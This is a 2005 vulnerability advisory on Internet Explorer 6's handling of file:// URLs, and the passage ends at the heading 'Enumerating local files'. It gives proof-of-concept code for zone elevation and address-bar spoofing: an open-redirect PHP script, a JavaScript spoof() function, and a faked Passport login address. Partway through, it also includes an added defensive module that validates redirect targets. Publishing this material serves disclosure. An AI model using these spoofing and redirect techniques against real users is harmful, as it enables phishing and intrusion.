Internet Explorer inconsistent file protocol handling


Yorick Koster, August 2005

Tested software


The following versions were tested and confirmed to be affected.

   * Internet Explorer 6.0 SP1 (Windows 2000 Professional SP4)
   * Internet Explorer 6.0 SP2 (Windows XP Professional SP2)

Please note that Internet Explorer on Windows XP reacts differently from Internet Explorer on Windows 2000.

Loading local files


Make sure you have a file named test.html in your root directory before trying to use the examples below. For example:

<html>
<body>
   <script>document.write(document.location);</script>
</body>
</html>


As is well known, linking to arbitrary files on the local computer is not allowed. For example, clicking the following links does not load the file c:\test.html:

file://c|/test.html
file://c:/test.html

It appears that by omitting the drive letter from the link, Internet Explorer will happily load the file. This can be observed using the link below:

file:///test.html


Figure 1: file:///test.html on Windows 2000


Figure 2: file:///test.html on Windows XP

The same link will not load when it is opened in a new window. To achieve that, the same link can be loaded using a redirect.

Zone elevation


As can be seen in Figure 1 and Figure 2, loading the c:\test.html file does not give us additional privileges (i.e. it does not load the file in a different security zone).

It appears that loading files from the root directory causes these files to be loaded in the Internet zone. Further testing has revealed that, on Windows 2000, loading a file from a subdirectory will load that file in the local intranet zone. For example:

file:///WINNT/Help/ciadmin.htm


Figure 3: file:///WINNT/Help/ciadmin.htm on Windows 2000

On Windows XP, this trick does not work: the same page is loaded in the Internet zone:

file:///WINDOWS/Help/ciadmin.htm


Figure 4: file:///WINDOWS/Help/ciadmin.htm on Windows XP

The following example requires that a subdirectory test exists containing a copy of test.html.

Because local files can be loaded in the intranet zone on Windows 2000, we can elevate security zones. This can be done if one of the following conditions is met:

   * We can place an arbitrary file on the local computer with a known (or predictable) location.
   * We can find a local file containing a cross-site scripting vulnerability.

Once we have elevated to the local intranet zone, we can easily get into the local computer zone. This is done by loading the same file again, but this time with the drive letter added to the link. This is demonstrated in the example below:

file:///test/test.html?<script>location.href='file://c|/test/test.html';</script>


Figure 5: file:///test/test.html?<script>location.href='file://c|/test/test.html';</script> on Windows 2000

Running arbitrary code in the local computer zone is possible on Windows 2000, but still requires another vulnerability. Windows XP is not affected by this issue; this is probably related to the issue described below.

Address bar spoofing


It appears that Internet Explorer on Windows XP reacts differently from Internet Explorer on Windows 2000. Looking at Figure 1 and Figure 3 we can see that the address bar shows the location My Computer (Windows 2000). Figure 2 and Figure 4 still show the location of the page containing the file:/// link in the address bar (Windows XP).

Internet Explorer on Windows XP does not update its address bar when loading the file:/// URL. Consequently, we can spoof the address bar on Windows XP. To do so, we have to find a web site that accepts a URL starting with file:/// and either redirects to it or includes it in its web page. In addition, one of the following conditions has to be met:

   * We can place an arbitrary file on the local computer with a known (or predictable) location.
   * We can find a local file containing a cross-site scripting vulnerability.

Example:

http://dw.com.com/redir?destUrl=file:///test.html


Figure 6: address bar spoof of http://dw.com.com on Windows XP

The above example uses a redirect. Among others, redirects are used by search engines, web mail and e-commerce applications. Other attack scenarios are also possible. For example, in some cases it is possible to send an HTML email containing a file:/// link to someone using a web mail application. Some applications also allow users to add links, for example guest books.

This address bar spoof uses a vulnerability in a web application, which should normally not accept links starting with file://. Furthermore, this attack also requires another vulnerability in order to load arbitrary content.

Address bar spoof part II


The following examples are loaded from a network share called 'pub' on a computer called 'zeus'. Substitute zeus with a valid computer name or a valid IP address.

Loading arbitrary files from the local computer works using file:/// URLs, but we can also add localhost to these URLs. When Internet Explorer loads file://localhost/ URLs, it first strips localhost from the URL, so we effectively end up with a file:/// URL. This behavior can be seen by following the link below and viewing the properties of the error page:

file://localhost/blablablabla


Figure 7: file://localhost/blablablabla on Windows XP

There is a small difference between file:/// and file://localhost/ URLs. The latter actually allows us to spoof the address bar on both Windows XP and Windows 2000. Since the localhost part is stripped from the URL, we can load files from network shares simply by adding the share to the URL. The following example demonstrates this:

file://localhost\\zeus\pub\index.html


Figure 8: file://localhost\\zeus\pub\index.html on Windows 2000

Please note that this trick does not work very well in many cases. The example shown in Figure 8 uses a redirect to load the file://localhost/ URL. When using a direct link, Internet Explorer converts the backslashes into forward slashes, which does not trigger the address bar spoof:

file://localhost////zeus/pub/index.html

The following PHP script is used for the redirect:

<?php
   // Redirect to whatever is passed in the "url" query parameter. This is
   // deliberately an open redirect: it exists only to demonstrate the spoof.
   if(isset($_GET['url']))
   {
      header("Location: " . $_GET['url']);
      exit;
   }

   // No parameter given: fall back to the site's own start page.
   header("Location: /index.html");
?>


This address bar spoof requires outgoing SMB connections in order to work, so an attacker is most likely to be successful on large corporate networks. This issue also requires a vulnerability in a web application, as it uses a redirect containing user input.
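The two web-application conditions above (a redirect that accepts file:// links, and the localhost-stripping and backslash handling described in this section and under "Loading local files") both come down to the same server-side check. The following Node.js module is an added example, not code from the original advisory or its author: it classifies a file: URL into the shapes discussed on this page (drive letter, root, subdirectory, localhost-stripped, backslash UNC share) and uses that classifier in an allow-list check that a redirect script such as redir.php should perform before sending a Location header. The function names, the allow-listed host www.example.com and the sample inputs are assumptions of this example; the parsing mirrors the behaviour this advisory describes, not any documented Internet Explorer API.

```javascript
// Added example, not from the original advisory: classify the file: URL
// forms described above and reject them in a redirect target check.
// Host names (zeus, pub, www.example.com) are constructed sample values.

// Remove control characters and surrounding whitespace before matching,
// since lenient clients ignore them.
function clean(raw) {
  return String(raw).replace(/[\u0000-\u001f\u007f]/g, '').trim();
}

// Returns null unless the input is a file: URL; otherwise returns an object
// describing which of the advisory's shapes it takes:
//   drive        file://c|/test.html, file://c:/test.html
//   root         file:///test.html (no drive letter, file in the root)
//   subdirectory file:///WINNT/Help/ciadmin.htm
//   unc          file://localhost\\zeus\pub\index.html or file://zeus/pub/...
// A leading "localhost" is stripped first, mirroring the behaviour the
// advisory describes for Internet Explorer.
function classifyFileUrl(raw) {
  const url = clean(raw);
  const m = /^file:(\/\/)?(.*)$/i.exec(url);
  if (!m) return null;
  let rest = m[2];
  let localhostStripped = false;
  const lh = /^localhost(.*)$/i.exec(rest);
  if (lh) { rest = lh[1]; localhostStripped = true; }

  // Backslash UNC form that remains once localhost has been removed.
  const unc = /^\\\\([^\\\/]+)\\([^\\\/]+)(.*)$/.exec(rest);
  if (unc) {
    return { kind: 'unc', host: unc[1], share: unc[2],
             path: unc[3].replace(/\\/g, '/'), localhostStripped };
  }
  // Standard file://host/share/path form (a host part, not a drive letter).
  if (m[1] && !localhostStripped && /^[^\\\/]/.test(rest) && !/^[a-z][|:]/i.test(rest)) {
    const parts = rest.split(/[\\\/]+/);
    return { kind: 'unc', host: parts[0], share: parts[1] || '',
             path: '/' + parts.slice(2).join('/'), localhostStripped };
  }
  rest = rest.replace(/^[\\\/]+/, '');
  const drive = /^([a-z])[|:](?:[\\\/]+(.*))?$/i.exec(rest);
  if (drive) {
    return { kind: 'drive', drive: drive[1].toUpperCase(),
             path: '/' + (drive[2] || '').replace(/\\/g, '/'), localhostStripped };
  }
  const path = '/' + rest.replace(/\\/g, '/');
  const depth = path.split('/').filter(Boolean).length;
  return { kind: depth <= 1 ? 'root' : 'subdirectory', path, localhostStripped };
}

// Allow-list check for a redirect parameter: only a same-site absolute path
// or an http(s) URL whose host is on the allow list is accepted.
function isSafeRedirectTarget(raw, allowedHosts) {
  const url = clean(raw);
  if (classifyFileUrl(url) !== null) return false;        // every file: variant
  if (/^[\\\/]{2}/.test(url)) return false;               // //host and \\host forms
  if (url === '/' || /^\/[^\\\/]/.test(url)) return true; // local path such as /index.html
  let parsed;
  try { parsed = new URL(url); } catch (e) { return false; } // relative junk, unparsable
  if (parsed.protocol !== 'http:' && parsed.protocol !== 'https:') return false;
  return allowedHosts.map(h => h.toLowerCase()).includes(parsed.hostname.toLowerCase());
}

// The Location value a redirect script should send: the validated target,
// or the site's own start page when the parameter is missing or rejected.
function safeLocation(rawParam, allowedHosts) {
  return isSafeRedirectTarget(rawParam, allowedHosts) ? clean(rawParam) : '/index.html';
}

// Constructed sample inputs following the URL shapes shown in the advisory.
const SAMPLES = [
  'file://c|/test.html',
  'file:///test.html',
  'file:///WINNT/Help/ciadmin.htm',
  'file://localhost/blablablabla',
  'file://localhost\\\\zeus\\pub\\index.html',
  'file://localhost////zeus/pub/index.html',
  'http://www.example.com/redir?x=1',
  '/index.html',
];
for (const s of SAMPLES) {
  console.log(s, '=>', JSON.stringify(classifyFileUrl(s)),
              'safe redirect:', isSafeRedirectTarget(s, ['www.example.com']));
}
```

The check runs on the raw parameter before any decoding the client might apply, so upper-case schemes, surrounding whitespace and the backslash share form are all caught; anything that is rejected falls back to /index.html, the same fallback the PHP script above already uses when no url parameter is supplied. Note that the forward-slash form file://localhost////zeus/... classifies as a local subdirectory path rather than a share, which matches the observation above that Internet Explorer treats it differently from the backslash form.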

Address bar spoof part III


Finally, there is a way to spoof the address bar without using a vulnerability in a web application. This spoof can be achieved using a very simple JavaScript function together with our redirect script. The JavaScript function looks like this:

function spoof(url, file)
{
   // Open the legitimate URL in a new window, then immediately navigate that
   // window through redir.php to the file:/// URL.
   var w = window.open(url, '_blank');
   w.location.href = 'redir.php?url=' + file;
}


Using this JavaScript function, we can spoof the address bar as follows:

javascript:spoof('http://www.microsoft.com', 'file:///test.html')


Figure 9: Spoofed www.microsoft.com on Windows XP

It appears that we can show just about anything in the address bar. The following also works:

javascript:spoof('blabla://blablabla', 'file:///test.html')


Figure 10: Spoofed blabla://blablabla on Windows XP

The above does not work on Windows 2000, where the address bar will show My Computer. It does work using a network share, as demonstrated in the following example:

javascript:spoof('https://login.passport.neti/uilogin.srf?lc=104&id=2', 'file://localhost\\\\zeus\\pub\\index.html')


Figure 11: Spoofed login.passport.net on Windows 2000

In order to exploit this issue, outgoing SMB connections are required. Everything else is under the attacker's control.

Enumerating local files


Finally, using file:/// URLs, it is also possible to enumerate local files.